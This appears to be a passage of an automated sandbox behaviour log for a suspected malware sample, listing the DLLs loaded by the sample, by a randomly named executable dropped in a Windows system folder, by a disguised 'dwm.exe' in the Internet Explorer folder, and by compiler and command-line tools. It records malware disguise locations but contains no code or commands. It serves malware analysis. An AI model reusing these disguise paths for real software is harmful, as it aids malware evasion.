Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: mscoree.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: version.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: uxtheme.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: windows.storage.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: wldp.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: profapi.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: cryptsp.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: rsaenh.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: cryptbase.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: mscoree.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: apphelp.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: version.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: wldp.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: profapi.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: cryptsp.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: rsaenh.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: version.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: profapi.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: ktmw32.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: rasman.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: propsys.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: dlnashext.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: wpdshext.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: edputil.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: netutils.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: slc.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: userenv.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: sppc.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: mscoree.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: version.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: uxtheme.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: windows.storage.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: wldp.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: profapi.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: cryptsp.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: rsaenh.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: cryptbase.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: sspicli.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: ktmw32.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: rasapi32.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: rasman.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: rtutils.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: mswsock.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: winhttp.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: dnsapi.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: winnsi.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: propsys.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: apphelp.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: dlnashext.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: wpdshext.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: edputil.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: urlmon.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: iertutil.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: srvcli.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: netutils.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: wintypes.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: appresolver.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: slc.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: userenv.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: sppc.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: version.dll
